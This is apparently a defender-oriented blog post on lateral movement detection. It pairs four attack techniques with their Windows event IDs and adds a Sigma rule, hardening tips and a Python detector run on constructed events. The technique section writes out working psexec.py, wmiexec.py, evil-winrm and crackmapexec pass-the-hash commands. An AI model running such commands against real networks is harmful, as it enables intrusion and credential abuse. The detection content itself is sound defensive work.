The Phase Between Foothold and Objectives
Lateral movement is where most attackers spend the majority of their dwell time. It's also where defenders have the best detection opportunities — because legitimate admin activity looks different from attacker lateral movement at the protocol level.
Common Techniques
PsExec / SMB Exec:
psexec.py corp.local/admin:'pass'@10.10.10.20
# Detection: Event ID 7045 (service install), 5145 (ADMIN$ access)
WMI:
wmiexec.py corp.local/admin:'pass'@10.10.10.20
# Detection: Event ID 4688 (WmiPrvSE.exe spawning cmd.exe)
WinRM:
evil-winrm -i 10.10.10.20 -u admin -p 'pass'
# Detection: Event ID 4624 logon type 3 (network), plus Event ID 4688 with wsmprovhost.exe as the parent process
Pass-the-Hash:
crackmapexec smb 10.10.10.0/24 -u admin -H <ntlm_hash>
# Detection: 4624 type 3 with NTLMv2, no Kerberos pre-auth
Detection Rule (Sigma)
title: Lateral Movement via PsExec
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 7045
    ServiceName|contains: 'PSEXESVC'
  condition: selection
Defensive Takeaways
- Block workstation-to-workstation SMB at the firewall level
- Enable detailed process creation logging (Event 4688 with command line)
- Alert on any use of ADMIN$ from non-jump-host sources
- Tiered admin model: different credentials for workstations, servers, and DCs
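As an added example (not code from the original post), here is a small detector that applies the event-ID mappings listed under Common Techniques (7045 with PSEXESVC, 4688 with WmiPrvSE.exe or wsmprovhost.exe as parent, 4624 type 3 with NTLM) and the "ADMIN$ from non-jump-host sources" takeaway to a handful of constructed Windows event records. The field names mirror the Security and System log schemas, the jump-host allowlist (10.10.10.5) and every event value are made up for the example, and treating powershell.exe as a shell alongside cmd.exe is an assumption that slightly generalizes the post's cmd.exe-only note.

```python
# Added example: event-ID based lateral movement detection over constructed
# Windows event records. Not part of the original post; all hosts, IPs and
# field values below are made up.
from dataclasses import dataclass
from typing import Dict, List, Optional

# Assumed allowlist of admin jump hosts (constructed).
JUMP_HOSTS = {"10.10.10.5"}

# Constructed sample events. Field names follow the Windows Security/System
# log schema (EventID, ShareName, ParentProcessName, ...); values are invented.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "7045", "Computer": "WS01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": "5145", "Computer": "WS01", "ShareName": r"\\*\ADMIN$",
     "IpAddress": "10.10.10.20", "SubjectUserName": "admin"},
    {"EventID": "5145", "Computer": "SRV02", "ShareName": r"\\*\ADMIN$",
     "IpAddress": "10.10.10.5", "SubjectUserName": "admin"},          # jump host: benign
    {"EventID": "4688", "Computer": "WS01",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c hostname"},
    {"EventID": "4688", "Computer": "WS01",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},  # user shell: benign
    {"EventID": "4688", "Computer": "SRV02",
     "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"EventID": "4624", "Computer": "SRV02", "LogonType": "3",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "IpAddress": "10.10.10.20", "TargetUserName": "admin"},
    {"EventID": "4624", "Computer": "SRV02", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "LmPackageName": "-",
     "IpAddress": "10.10.10.5", "TargetUserName": "admin"},            # Kerberos from jump host: benign
]

SHELLS = {"cmd.exe", "powershell.exe"}                      # assumed shell set
REMOTE_EXEC_PARENTS = {"wmiprvse.exe": "WMI exec",          # 4688 parent -> technique label
                       "wsmprovhost.exe": "WinRM exec"}


@dataclass(frozen=True)
class Alert:
    rule: str
    computer: str
    detail: str


def _basename(path: str) -> str:
    """Last path component, lower-cased, so C:\\...\\cmd.exe matches cmd.exe."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_psexec(ev: Dict[str, str]) -> bool:
    """Same logic as the Sigma rule in the post: 7045 with PSEXESVC in the service name."""
    return ev.get("EventID") == "7045" and "psexesvc" in ev.get("ServiceName", "").lower()


def rule_admin_share(ev: Dict[str, str], jump_hosts: set) -> bool:
    """5145 access to ADMIN$ from any source that is not an approved jump host."""
    return (ev.get("EventID") == "5145"
            and ev.get("ShareName", "").upper().endswith("ADMIN$")
            and ev.get("IpAddress") not in jump_hosts)


def rule_remote_exec(ev: Dict[str, str]) -> Optional[str]:
    """4688 where a WMI or WinRM host process spawns a shell; returns the technique label."""
    if ev.get("EventID") != "4688":
        return None
    parent = _basename(ev.get("ParentProcessName", ""))
    child = _basename(ev.get("NewProcessName", ""))
    if parent in REMOTE_EXEC_PARENTS and child in SHELLS:
        return REMOTE_EXEC_PARENTS[parent]
    return None


def rule_ntlm_network_logon(ev: Dict[str, str], jump_hosts: set) -> bool:
    """4624 logon type 3 authenticated with NTLM (not Kerberos) from a non-jump-host."""
    return (ev.get("EventID") == "4624" and ev.get("LogonType") == "3"
            and ev.get("AuthenticationPackageName", "").upper() == "NTLM"
            and ev.get("IpAddress") not in jump_hosts)


def detect(events: List[Dict[str, str]], jump_hosts: set = JUMP_HOSTS) -> List[Alert]:
    """Run every rule over the event list and return the alerts in event order."""
    alerts: List[Alert] = []
    for ev in events:
        host = ev.get("Computer", "?")
        if rule_psexec(ev):
            alerts.append(Alert("PsExec service install", host, ev["ServiceName"]))
        if rule_admin_share(ev, jump_hosts):
            alerts.append(Alert("ADMIN$ access from non-jump-host", host, ev["IpAddress"]))
        technique = rule_remote_exec(ev)
        if technique:
            alerts.append(Alert(technique, host, ev.get("CommandLine", "")))
        if rule_ntlm_network_logon(ev, jump_hosts):
            alerts.append(Alert("NTLM network logon (possible pass-the-hash)", host, ev["IpAddress"]))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.computer}: {a.detail}")
```

Run as-is it raises five alerts and stays silent on the three benign records (ADMIN$ and a Kerberos logon from the jump host, and a user-launched cmd.exe). The NTLM rule is the noisiest of the four: network logons with the NTLM package also occur legitimately (access by IP address, non-domain-joined hosts), so in practice it is tuned with a source allowlist and a baseline rather than alerting on every match.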